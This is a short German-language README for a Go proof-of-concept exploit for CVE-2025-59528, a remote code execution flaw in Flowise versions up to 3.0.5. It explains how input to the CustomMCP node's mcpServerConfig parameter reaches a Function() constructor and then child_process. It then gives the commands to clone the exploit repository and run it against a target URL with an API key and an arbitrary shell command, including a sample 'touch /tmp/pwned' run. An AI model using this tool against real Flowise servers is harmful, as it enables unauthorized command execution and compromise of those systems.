
Go-Proof-of-Concept (PoC)-Exploit für Flowise CustomMCP Remote Code Execution (RCE) CVE-2025-59528
Ein Proof-of-Concept in Go für CVE-2025-59528, das Flowise-Versionen <= 3.0.5 betrifft.
Flowise ermöglicht die Ausführung nicht validierten JavaScript-Codes über die Knotenkonfiguration CustomMCP. Die Anwendung übergibt benutzergelieferte Eingaben im Parameter mcpServerConfig direkt an einen Function()-Konstruktor innerhalb der Backend-Funktion convertToValidJSONString. Dadurch wird Code mit vollen Node.js-Berechtigungen ausgeführt, was die Ausführung beliebiger Systembefehle über child_process ermöglicht.
git clone https://github.com/Moon-Harvest/CVE-2025-59528
cd CVE-2025-59528/
go run main.go <target-base-url> <api-key> <command>
go run main.go http://target.com h3D_9jD7Xzi0V2KSrld9ff4P3rm6cuNXg1uA-wFsUYc "touch /tmp/pwned"